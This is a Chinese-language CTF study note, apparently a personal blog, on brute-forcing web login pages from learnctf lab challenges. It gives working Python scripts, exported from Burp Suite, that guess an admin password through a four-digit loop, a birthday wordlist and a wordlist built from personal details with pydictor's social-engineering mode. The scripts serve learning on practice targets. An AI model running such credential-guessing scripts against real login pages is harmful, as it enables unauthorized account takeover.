web学习笔记之暴力破解喵

今天来学习一下暴力破解喵~

bp太慢了怎么办？多半是废了 来一波曲线救国叭~

在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦

方法：
bp中点Extensions➡BApp Store➡search查找框输入 copy as Python-requests➡install

想知道如何使用吗？话不多说，直接上栗子（题目来源于learnctf，侵权删）➡

四位数密码…bp这得爆多久哇QAQ，不如我们拿python试试呢？

步骤：

1）先抓包➡右键点击➡选择Extensions➡选择copy as requests with session object（为什么选这个呢？因为他会保留一些登录凭证并且速度更快）

2）打开vs code（已下载好python）➡新建一个py文件➡curl+v复制，会得到，这样我们就把这个请求转化为了python代码

import requests #import 引入一个库，requests库有很多功能，比如这里使用的发送http请求

session = requests.session() #session 可以保存一些http请求的状态

burp0_url = "http://192.168.154.128:32835/login.php" #这是要访问的网页
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://192.168.154.128:32835", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.154.128:32835/", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} #这段是http请求头内容
burp0_data = {"username": "admin", "password": "1234"} #发送的内容存在py中一个字点中
session.post(burp0_url, headers=burp0_headers, data=burp0_data) #使用post请求

3）我们对其进行修改，以达到爆破的目的（这里要格外注意缩进！！！）

 import requests

session = requests.session()

burp0_url = "http://192.168.154.128:32835/login.php"
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://192.168.154.128:32835", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.154.128:32835/", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
for i in range (1000,10000):#从1000挨个试，试到9999
    print(i)
    burp0_data = {"username": "admin", "password": str(i)}
    ret = session.post(burp0_url, headers=burp0_headers, data=burp0_data) #把请求后的相应存在ret变量里
    if '用户名或密码错误！' not in ret.text: #如果‘用户名或密码错误！’不出现在响应里（这就代表把密码爆破出来了）就以字符串形式打印相应，并且终止循环，运行
        print(ret.text)
        break

就可以得到flag了喵~

pudictor是什么喵？快来学喵(❁´◡`❁)

pydictor可以生成密码字典喵~（可在kali里面安装哦）

来看道题叭~

1）大致的思路和上面的一样，但我们首先需要一个从1995年1月1日到1995年12月31日的生日密码字典，这时候就可以用到pydictor啦，我们就这样在kali里输➡_➡

看最后一行：
-plug 的意思是使用一个插件，这个插件是哪一个插件呢？
没错，就是后面跟着的birthday。我们的要求是从1995年1月1日到1995年12月31日，因此输入19950101 19951231
并且限制长度（–len）为6到8位

2）然后我们使用sz命令，把我们生成的密码字典下载下来（格式为sz 要下载的文件的路径），接下来要开始转战vs code啦【图中箭头处就是我们生成的密码字典的路径】

3）还是一样的套路，先bp抓包将请求转化为python代码，接下来爆改一下这段代码，来得到我们心爱的flag叭~o(￣︶￣)o

我们就这样写：

import requests

session = requests.session()

burp0_url = "http://192.168.154.128:32836/login.php"
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://192.168.154.128:32836", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.154.128:32836/", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
with open('birthday_225254.txt','r') as file: #with的作用是自动在运行结束时关闭打开的文件；这里的‘r’的意思是‘读取’；as的作用是将读取到的保存在file中
    for line in file: #line的意思是每次读取一行
        line = line.strip() #这一行代码的意思是去除行末的换行符
        print(line)
        burp0_data = {"username": "admin", "password": line}
        response = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if '用户名或密码错误！' not in response.text:
             print(response.text)
             break

这里需要注意的是：我们可以在vscode中新建一个文件夹，然后把我们下载下来的密码字典和.py放在一起，否则我们是需要写密码字典的完整路径的（with open那一行）

运行代码后我们就可以获得flag啦~( •̀ ω •́ )y

Gloria好困喵，今天先写到这里叭，晚安喵~ (∪.∪ )…zzz

---

Ok啊一觉睡到十点，我们继续叭~

咦？好像是进阶版的pydictor？快来看看叭

以一道题为栗（￣︶￣）↗　（来源于learnctf，侵权删）

是社会工程学哎~

社会工程学：利用个人的信息来推测他们的密码(＃°Д°)（想起来前几天被朋友“盒”了，畏惧了老大Orz

那么，天空一声巨响，pydictor闪亮登场~

步骤：

我们应该还是要根据它提供的信息，使用pydictor生成一个密码字典，再用python进行爆破

1）打开我们的kali，进入pydictor

我们输入python3 pydictor --sedb（这里的sedb是指社会工程数据库：Social Engineering Database），查看help desc，使用set把对应的信息填进去生成我们需要的密码字典，（记得要输入exit退出pydictor喵~）再使用sz下载

2）下一步嘛…自然是抓包转成.py并修改来进行爆破啦~（跟上面的第二道题是一样的

import requests

session = requests.session()

burp0_url = "http://192.168.154.128:32840/login.php"
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://192.168.154.128:32840", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.154.128:32840/", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
with open('sedb_155912.txt','r') as file:
    for line in file:
        line = line.strip()
        print(line)
        burp0_data = {"username": "admin", "password": line}
        response = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if '用户名或密码错误！' not in response.text:
            print(response.text)
            break

运行，于是心爱的flag就出现啦~

Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵~